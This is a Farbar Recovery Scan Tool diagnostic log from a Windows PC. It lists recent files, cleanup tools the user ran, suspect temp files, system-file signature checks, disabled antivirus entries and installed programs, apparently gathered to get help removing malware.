2014-08-24 16:49 - 2014-08-24 16:49 - 00430080 _____ () C:\Users\THINK\Desktop\7-6空间直线及其方程.ppt
2014-08-24 12:43 - 2014-08-25 10:38 - 00000000 ____D () C:\Users\THINK\Desktop\dudley
2014-08-24 10:48 - 2014-08-24 10:48 - 00000000 ____D () C:\$360Section
2014-08-19 01:50 - 2014-08-19 01:50 - 03695208 _____ (Sogou.com Inc.) C:\windows\system32\SogouPY.ime
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-15 17:14 - 2014-09-15 17:13 - 00035813 _____ () C:\Users\THINK\Desktop\FRST.txt
2014-09-15 17:13 - 2014-09-15 17:13 - 01097728 _____ (Farbar) C:\Users\THINK\Desktop\FRST (1).exe
2014-09-15 17:13 - 2014-09-14 12:49 - 00000000 ____D () C:\FRST
2014-09-15 17:10 - 2011-04-03 20:26 - 00000000 ____D () C:\Users\THINK\AppData\Local\Last.fm
2014-09-15 16:56 - 2011-02-04 07:53 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\迅雷软件
2014-09-15 16:55 - 2014-09-14 17:20 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-15 16:04 - 2006-11-02 08:47 - 00003744 _____ () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-15 16:04 - 2006-11-02 08:47 - 00003744 _____ () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-15 14:55 - 2013-05-30 16:35 - 00000000 ____D () C:\Users\THINK\Desktop\der
2014-09-15 13:36 - 2014-09-15 13:36 - 00688992 ____R (Swearware) C:\Users\THINK\Desktop\dds.com
2014-09-15 12:16 - 2014-09-15 12:12 - 00002514 _____ () C:\Users\THINK\Desktop\Rkill.txt
2014-09-15 12:12 - 2014-09-15 12:12 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\THINK\Desktop\rkill.exe
2014-09-15 12:05 - 2014-07-20 20:56 - 00769409 _____ () C:\windows\WindowsUpdate.log
2014-09-15 11:21 - 2010-04-04 06:52 - 00000000 ____D () C:\Program Files\Everything
2014-09-15 11:09 - 2009-10-01 03:38 - 00000000 ____D () C:\Users\Public\Thunder Network
2014-09-15 09:55 - 2011-10-01 10:30 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\renren.com
2014-09-15 00:29 - 2014-09-15 00:29 - 00000000 ____D () C:\Program Files\ESET
2014-09-15 00:28 - 2014-09-15 00:28 - 02347384 _____ (ESET) C:\Users\THINK\Desktop\esetsmartinstaller_enu.exe
2014-09-15 00:04 - 2014-07-21 19:56 - 00000000 ____D () C:\ProgramData\ProductData
2014-09-15 00:02 - 2006-11-02 09:01 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-09-15 00:01 - 2014-09-15 00:01 - 00000532 _____ () C:\windows\PFRO.log
2014-09-15 00:01 - 2010-10-04 07:35 - 02717216 _____ () C:\windows\system32\OODBS.lor
2014-09-14 23:28 - 2014-09-14 23:27 - 00000000 ____D () C:\ProgramData\MFAData
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\MFAData
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\Avg2015
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\Avg2014
2014-09-14 23:25 - 2014-09-14 23:24 - 04927216 _____ (AVG Technologies) C:\Users\THINK\Desktop\avg_free_stb_all_2014_4765.exe
2014-09-14 22:56 - 2009-09-29 21:27 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Winamp
2014-09-14 22:20 - 2014-09-14 22:20 - 00000976 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 22:20 - 2014-09-14 22:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 22:20 - 2014-07-21 19:55 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\IObit
2014-09-14 22:20 - 2014-07-21 19:55 - 00000000 ____D () C:\Program Files\IObit
2014-09-14 22:05 - 2014-09-14 22:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\木马清除专家 2014
2014-09-14 22:01 - 2014-09-14 22:00 - 13221712 _____ () C:\Users\THINK\Desktop\avt_setup.exe
2014-09-14 21:09 - 2013-10-06 18:14 - 00000000 ____D () C:\Users\THINK\Desktop\常用软件
2014-09-14 21:09 - 2013-02-16 19:04 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\hao123桌面版
2014-09-14 21:09 - 2012-02-23 13:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\超级函数表达式运算器
2014-09-14 21:09 - 2010-05-16 07:56 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FlashFXP
2014-09-14 21:09 - 2009-09-15 09:50 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\电精2
2014-09-14 21:09 - 2009-09-12 05:34 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft AppLocale
2014-09-14 21:09 - 2009-09-11 21:42 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\拳皇97
2014-09-14 19:59 - 2014-09-14 19:59 - 00000049 _____ () C:\Users\THINK\AppData\Roaming\pk.ini
2014-09-14 19:59 - 2014-09-14 19:59 - 00000000 ____D () C:\Users\THINK\Desktop\顽固木马克星
2014-09-14 19:59 - 2014-09-14 19:52 - 24403519 _____ () C:\Users\THINK\Desktop\360compkill5.1.0.1102-0905.zip
2014-09-14 19:56 - 2014-09-14 19:55 - 04838816 _____ () C:\Users\THINK\Desktop\TrojanKill.exe
2014-09-14 18:24 - 2006-11-02 07:18 - 00000000 ____D () C:\windows\schemas
2014-09-14 18:17 - 2011-01-16 02:29 - 00000012 _____ () C:\windows\bthservsdp.dat
2014-09-14 18:17 - 2006-11-02 09:01 - 00032668 _____ () C:\windows\Tasks\SCHEDLGU.TXT
2014-09-14 17:44 - 2012-03-11 11:14 - 00000000 ____D () C:\Program Files\MemTest
2014-09-14 17:44 - 2010-05-16 07:56 - 00000000 ____D () C:\Program Files\FlashFXP
2014-09-14 17:19 - 2014-09-14 17:19 - 00000909 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 17:19 - 2014-09-14 17:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 17:19 - 2014-09-14 17:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 17:19 - 2013-07-11 01:00 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Malwarebytes
2014-09-14 17:19 - 2013-07-11 01:00 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-14 17:19 - 2013-07-11 01:00 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-09-14 16:56 - 2011-06-21 07:09 - 00000000 ____D () C:\ProgramData\360SD
2014-09-14 16:45 - 2014-09-12 19:10 - 00000000 __SHD () C:\Users\THINK\AppData\Roaming\360Quarant
2014-09-14 16:30 - 2014-09-14 12:57 - 00000000 ____D () C:\Qoobox
2014-09-14 16:30 - 2011-09-02 18:30 - 00000000 ____D () C:\Users\THINK\AppData\Local\Apps\2.0
2014-09-14 16:29 - 2014-09-14 16:29 - 00041256 _____ () C:\ComboFix.txt
2014-09-14 16:29 - 2013-02-26 22:43 - 00000000 ____D () C:\Users\Administrator
2014-09-14 16:29 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-09-14 16:28 - 2014-09-14 12:57 - 00000000 ____D () C:\windows\erdnt
2014-09-14 16:21 - 2006-11-02 06:23 - 00000215 _____ () C:\windows\system.ini
2014-09-14 15:57 - 2011-03-18 11:02 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Baidu
2014-09-14 15:56 - 2009-09-10 04:15 - 00000000 ____D () C:\Users\THINK
2014-09-14 13:14 - 2009-09-11 00:43 - 00002708 _____ () C:\Users\THINK\AppData\Local\d3d9caps.dat
2014-09-14 12:55 - 2014-09-14 12:55 - 05578360 ____R (Swearware) C:\Users\THINK\Desktop\ComboFix.exe
2014-09-14 12:48 - 2014-09-14 12:48 - 01097728 _____ (Farbar) C:\Users\THINK\Desktop\FRST.exe
2014-09-14 12:36 - 2013-06-04 00:29 - 00000000 ____D () C:\ProgramData\QMovie
2014-09-14 12:28 - 2014-09-14 12:24 - 117624056 _____ (Microsoft Corporation) C:\Users\THINK\Desktop\msert.exe
2014-09-14 12:25 - 2014-09-14 12:25 - 30856384 _____ (Microsoft Corporation) C:\Users\THINK\Desktop\Windows-KB890830-V5.16.exe
2014-09-14 01:20 - 2014-09-14 01:20 - 00000000 ____D () C:\ProgramData\ksrbm
2014-09-14 01:20 - 2010-11-06 05:57 - 00000000 ____D () C:\ProgramData\Kingsoft
2014-09-14 00:49 - 2010-01-28 05:47 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\kingsoft
2014-09-14 00:37 - 2014-07-01 00:59 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\合金弹头全集
2014-09-14 00:37 - 2009-09-12 02:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RaySource
2014-09-13 23:57 - 2014-09-13 23:57 - 00000662 _____ () C:\Users\Public\Desktop\可牛急救箱.lnk
2014-09-13 23:57 - 2014-09-13 23:57 - 00000000 ____D () C:\Users\THINK\Desktop\可牛系统急救箱
2014-09-13 23:57 - 2014-09-13 23:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\可牛急救箱
2014-09-13 23:51 - 2014-09-08 14:29 - 00000000 ____D () C:\Users\THINK\Documents\QiyiVideoLibrary
2014-09-13 23:42 - 2014-09-13 23:41 - 00928768 _____ () C:\Users\THINK\Desktop\可牛系统急救箱_@106316@.exe
2014-09-13 23:13 - 2011-08-07 08:04 - 00000000 ____D () C:\Temp
2014-09-13 22:55 - 2014-09-13 22:54 - 16578402 _____ ( ) C:\Users\THINK\Desktop\DLLSuite_Setup.exe
2014-09-13 22:09 - 2012-09-24 15:54 - 00000000 ____D () C:\windows\pss
2014-09-12 21:24 - 2013-05-04 21:12 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Media Player Classic
2014-09-12 21:24 - 2009-09-15 01:22 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\DAEMON Tools Lite
2014-09-12 21:24 - 2009-09-12 20:08 - 00000000 ____D () C:\windows\Minidump
2014-09-12 21:11 - 2014-07-21 23:20 - 63619072 _____ () C:\windows\system32\config\SOFTWARE.iobit
2014-09-12 21:11 - 2014-07-21 23:20 - 42569728 _____ () C:\windows\system32\config\COMPONENTS.iobit
2014-09-12 21:11 - 2014-07-21 23:20 - 00311296 _____ () C:\windows\system32\config\DEFAULT.iobit
2014-09-12 21:11 - 2014-07-21 23:20 - 00065536 _____ () C:\windows\system32\config\SAM.iobit
2014-09-12 21:11 - 2014-07-21 23:20 - 00032768 _____ () C:\windows\system32\config\SECURITY.iobit
2014-09-12 20:49 - 2014-07-20 21:40 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\360SuperKiller
2014-09-12 18:56 - 2012-04-05 19:23 - 00701104 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-09-12 18:56 - 2011-05-12 21:14 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-11 23:04 - 2014-09-11 23:02 - 00711168 _____ () C:\Users\THINK\Desktop\第七章_半导体的表面.ppt
2014-09-11 18:17 - 2009-09-10 17:45 - 00342518 _____ () C:\windows\system32\prfh0804.dat
2014-09-11 18:17 - 2009-09-10 17:45 - 00121114 _____ () C:\windows\system32\prfc0804.dat
2014-09-11 18:17 - 2006-11-02 06:33 - 01237302 _____ () C:\windows\system32\PerfStringBackup.INI
2014-09-11 00:14 - 2014-09-11 00:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\墿崹僼儘儞僥傿傾
2014-09-10 23:45 - 2014-09-10 23:45 - 00000000 ____D () C:\Users\Public\SogouInput
2014-09-10 23:44 - 2014-09-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\搜狗拼音输入法
2014-09-10 23:44 - 2014-09-10 23:44 - 00000000 _____ () C:\windows\system32\nsyF3B8.tmp
2014-09-10 02:07 - 2012-08-05 23:52 - 00000000 ____D () C:\Users\THINK\Desktop\··原来的桌面
2014-09-10 02:05 - 2013-09-01 12:37 - 00000000 ____D () C:\Users\THINK\Desktop\杂
2014-09-10 02:04 - 2014-09-10 02:04 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Foxit Software
2014-09-10 02:02 - 2011-08-19 06:19 - 00000000 ____D () C:\Users\THINK\Desktop\新建文件夹
2014-09-08 15:03 - 2012-12-31 22:54 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\KuGou8
2014-09-08 14:32 - 2014-09-08 14:32 - 00000000 ____D () C:\ProgramData\LocalStorage
2014-09-08 14:29 - 2014-09-08 14:29 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\IQIYI Video
2014-09-08 14:29 - 2014-09-08 14:28 - 00000000 ____D () C:\Users\Public\QiYi
2014-09-06 21:40 - 2014-09-06 21:40 - 00000000 ____D () C:\Users\THINK\Desktop\小毛
2014-09-06 19:55 - 2014-09-06 19:55 - 00000000 ____D () C:\Users\THINK\AppData\Local\thunder network
2014-09-05 21:01 - 2011-03-21 06:25 - 00002193 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\P2pSearcher.exe.lnk
2014-09-05 00:18 - 2011-05-17 04:07 - 00000954 _____ () C:\Users\THINK\AppData\Roaming\CoreAVC.ini
2014-09-02 00:29 - 2012-02-10 01:18 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\SPlayer
2014-09-01 19:59 - 2013-12-06 13:16 - 00000000 ____D () C:\Users\THINK\Desktop\property
2014-09-01 06:33 - 2014-09-01 06:33 - 00016393 _____ () C:\windows\system32\hs_err_pid7548.log
2014-08-29 13:01 - 2006-11-02 06:24 - 98758480 _____ (Microsoft Corporation) C:\windows\system32\mrt.exe
2014-08-29 11:02 - 2014-08-29 11:02 - 00258932 _____ () C:\Users\THINK\Desktop\rephotos32ericson.zip
2014-08-28 11:59 - 2014-02-04 20:21 - 00000000 ____D () C:\Users\THINK\Desktop\文件
2014-08-27 11:47 - 2006-11-02 07:18 - 00000000 ____D () C:\windows\Microsoft.NET
2014-08-27 11:02 - 2006-11-02 07:18 - 00000000 ____D () C:\windows\rescache
2014-08-27 10:44 - 2013-12-08 18:02 - 00461528 _____ () C:\windows\system32\FNTCACHE.DAT
2014-08-27 00:36 - 2006-11-02 07:18 - 00000000 ____D () C:\windows\system32\zh-CN
2014-08-27 00:35 - 2006-11-02 08:37 - 00000000 ____D () C:\Program Files\Windows Journal
2014-08-27 00:33 - 2014-05-11 22:44 - 00000754 _____ () C:\Users\Administrator.THINK-PC\Desktop\QQ旋风.lnk
2014-08-26 21:49 - 2014-08-26 21:49 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\tzres.dll
2014-08-26 21:49 - 2014-07-21 19:55 - 00000994 _____ () C:\Users\Public\Desktop\Advanced SystemCare 7.lnk
2014-08-26 21:48 - 2014-08-26 21:48 - 02263552 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 01993728 _____ (Microsoft Corporation) C:\windows\system32\authui.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00638400 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dxgkrnl.sys
2014-08-26 21:48 - 2014-08-26 21:48 - 00332800 _____ (Microsoft Corporation) C:\windows\system32\msihnd.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00082432 _____ (Microsoft Corporation) C:\windows\system32\consent.exe
2014-08-26 21:48 - 2014-08-26 21:48 - 00037376 _____ (Microsoft Corporation) C:\windows\system32\cdd.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00033280 _____ (Microsoft Corporation) C:\windows\system32\appinfo.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 12356608 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 09739264 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 02382848 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-08-26 21:44 - 2014-08-26 21:44 - 01129472 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00353792 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00223232 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00176640 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00073216 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00041472 _____ (Microsoft Corporation) C:\windows\system32\msfeedsbs.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00011776 _____ (Microsoft Corporation) C:\windows\system32\mshta.exe
2014-08-26 21:44 - 2014-08-26 21:44 - 00010752 _____ (Microsoft Corporation) C:\windows\system32\msfeedssync.exe
2014-08-26 21:43 - 2014-08-26 21:43 - 01810432 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 01802240 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 01427968 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-08-26 21:43 - 2014-08-26 21:43 - 01137664 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00717824 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00421376 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00273408 _____ (Microsoft Corporation) C:\windows\system32\Drivers\afd.sys
2014-08-26 21:43 - 2014-08-26 21:43 - 00231936 _____ (Microsoft Corporation) C:\windows\system32\url.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00142848 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-08-26 21:42 - 2014-08-26 21:42 - 02051072 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-08-26 21:42 - 2014-08-26 21:42 - 01401344 _____ (Microsoft Corporation) C:\windows\system32\msxml6.dll
2014-08-26 21:42 - 2014-08-26 21:42 - 01248768 _____ (Microsoft Corporation) C:\windows\system32\msxml3.dll
2014-08-26 21:42 - 2014-08-26 21:42 - 00506880 _____ (Microsoft Corporation) C:\windows\system32\qedit.dll
2014-08-26 21:41 - 2014-08-26 21:41 - 00915392 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpip.sys
2014-08-26 21:41 - 2014-08-26 21:41 - 00502784 _____ (Microsoft Corporation) C:\windows\system32\usp10.dll
2014-08-26 21:41 - 2014-08-26 21:41 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpipreg.sys
2014-08-26 21:40 - 2014-08-26 21:40 - 11587584 _____ (Microsoft Corporation) C:\windows\system32\shell32.dll
2014-08-26 21:40 - 2014-08-26 21:40 - 00894464 _____ (Microsoft Corporation) C:\windows\system32\kernel32.dll
2014-08-26 21:40 - 2014-08-26 21:40 - 00876032 _____ (Microsoft Corporation) C:\windows\system32\wer.dll
2014-08-26 00:18 - 2009-11-15 06:28 - 00000069 _____ () C:\windows\NeroDigital.ini
2014-08-25 10:38 - 2014-08-24 12:43 - 00000000 ____D () C:\Users\THINK\Desktop\dudley
2014-08-24 16:49 - 2014-08-24 16:49 - 00430080 _____ () C:\Users\THINK\Desktop\7-6空间直线及其方程.ppt
2014-08-24 10:48 - 2014-08-24 10:48 - 00000000 ____D () C:\$360Section
2014-08-24 10:48 - 2013-05-01 18:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Disabled Startup
2014-08-21 17:23 - 2011-10-26 05:10 - 00000000 ____D () C:\Program Files\Common Files\PPLiveNetwork
2014-08-19 01:50 - 2014-08-19 01:50 - 03695208 _____ (Sogou.com Inc.) C:\windows\system32\SogouPY.ime
 
Files to move or delete:
====================
C:\ProgramData\1doc2pdf.dll
 
 
Some content of TEMP:
====================
C:\Users\THINK\AppData\Local\Temp\avgnt.exe
C:\Users\THINK\AppData\Local\Temp\dl_peer_id.dll
C:\Users\THINK\AppData\Local\Temp\XmpSetupHelper.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-15 12:10
 
==================== End Of Log ============================
 
 
 
 
Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 12-09-2014
Ran by THINK at 2014-09-15 17:14:53
Running from C:\Users\THINK\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avira Desktop (Disabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: 360杀毒 (Disabled - Up to date) {6F7A6B22-2309-7CD0-AF79-D11A4916C60C}
AS: Avira Desktop (Disabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: IObit Malware Fighter (Disabled - Up to date) {A751AC20-3B48-5237-898A-78C4436BB78D}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
115优蛋 (HKCU\...\115优蛋) (Version: 2.4.4.135 - 广东一一五网络有限公司)
2007 Office system 兼容包 (HKLM\...\{90120000-0020-0804-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
360杀毒 (HKLM\...\360SD) (Version: 5.0.0.5075 - 360安全中心)
91 PC Suite for iPhone (HKLM\...\{DACB19BF-B853-42FA-A686-8F55E065CA10}) (Version: 2.9.61.269 - 网龙公司)
Access Help (HKLM\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 2.00 - )
Adobe Flash Player 14 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Photoshop CS (HKLM\...\{EFB21DE7-8C19-4A88-BB28-A766E16493BC}) (Version: CS - Adobe Systems, Inc.)
Adobe Photoshop Lightroom 4.1 (HKLM\...\{C1575982-F1CA-46DC-A77D-43FF12F2EFC7}) (Version: 4.1.2 - Adobe)
Adobe Reader X (10.1.10) - Chinese Simplified (HKLM\...\{AC76BA86-7AD7-2052-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Advanced SystemCare 7 (HKLM\...\Advanced SystemCare 7_is1) (Version: 7.3.0 - IObit)
Antivirus Pro (HKLM\...\Avira AntiVir Desktop) (Version: 14.0.6.570 - Avira)
Apple Mobile Device Support (HKLM\...\{E14ADE0E-75F3-4A46-87E5-26692DD626EC}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Apple 应用程序支持 (HKLM\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
ASIO4ALL (HKLM\...\ASIO4ALL) (Version:  - )
ATI Catalyst Install Manager (HKLM\...\{EE84642F-D557-A6F3-4F22-1B25A524E73E}) (Version: 3.0.774.0 - ATI Technologies, Inc.)
ATI Uninstaller (HKLM\...\ATI Uninstaller) (Version: 8.52.4.3-080821b-068591C-Lenovo - ATI Technologies, Inc.)
Bing Bar (HKLM\...\{D322A9E3-758B-4D60-A7C4-65C88FD378D0}) (Version: 7.2.241.0 - Microsoft Corporation)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
CAJViewer (HKLM\...\{38CE8FAD-2E31-4CA8-B671-1BA7A8A54B28}) (Version: 7.0.2 - TTKN)
Camera Center (HKLM\...\{668ACF05-E455-4932-A2D2-5822A8206FEB}) (Version: 1.0.24 - Lenovo)
Canon SELPHY CP800 (HKLM\...\Canon SELPHY CP800) (Version:  - )
Canon Utilities SELPHY Photo Print (HKLM\...\SELPHY Photo Print) (Version: 1.2.0.7 - Canon Inc.)
Canon Utilities SELPHY Print Contents 1.1.0 (HKLM\...\SELPHY Print Contents 110) (Version: 1.1.0.16 - Canon Inc.)
Catalyst Control Center Core Implementation (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2008.0821.2318.39887 - ATI Technologies, Inc.) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0504.2152.37420 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0504.2152.37420 - ATI) Hidden
CCC Help English (Version: 2010.0504.2151.37420 - ATI) Hidden
ccc-core-static (Version: 2010.0504.2152.37420 - 公司名称) Hidden
ccc-utility (Version: 2010.0504.2152.37420 - ATI) Hidden
Cisco EAP-FAST Module (HKLM\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Client Security - Password Manager (HKLM\...\{44E9D4C2-946C-4378-9354-558803C47A68}) (Version: 8.20.0023.00 - Lenovo Group Limited)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Conexant 20561 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.92.15.0 - Conexant)
Crystal Reports Basic Runtime for Visual Studio 2008 (HKLM\...\{CE26F10F-C80F-4377-908B-1B7882AE2CE3}) (Version: 10.5.2.0 - Business Objects)
CyberLink PowerDVD 10 (HKLM\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.1516 - CyberLink Corp.)
CyberLink PowerDVD 10 (Version: 10.0.1516 - CyberLink Corp.) Hidden
DH Mobility Modder.NET (HKLM\...\MobilityDotNET) (Version: 1.2.1.0 - Ruud Ketelaars)
DirectXInstallService (Version: 9.0.2 - Roxio) Hidden
Drag-to-Disc (HKLM\...\{2F4C24E6-CBD4-4AAC-B56F-C9FD44DE5668}) (Version: 9.05 - Sonic Solutions)
Dropbox (HKCU\...\Dropbox) (Version: 2.0.22 - Dropbox, Inc.)
easyMule (HKLM\...\easyMule) (Version:  - )
eMule (HKLM\...\eMule) (Version:  - )
EndNote X6 (HKLM\...\{86B3F2D6-AC2B-0016-8AE1-F2F77F781B0C}) (Version: 16.0.0.6348 - Thomson Reuters)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
EVEREST Ultimate Edition v5.50 (HKLM\...\EVEREST Ultimate Edition_is1) (Version: 5.50 - Lavalys, Inc.)
Everything 1.2.1.371 (HKLM\...\Everything) (Version:  - )
Exact Audio Copy 1.0beta3 (HKLM\...\Exact Audio Copy) (Version: 1.0beta3 - Andre Wiethoff)
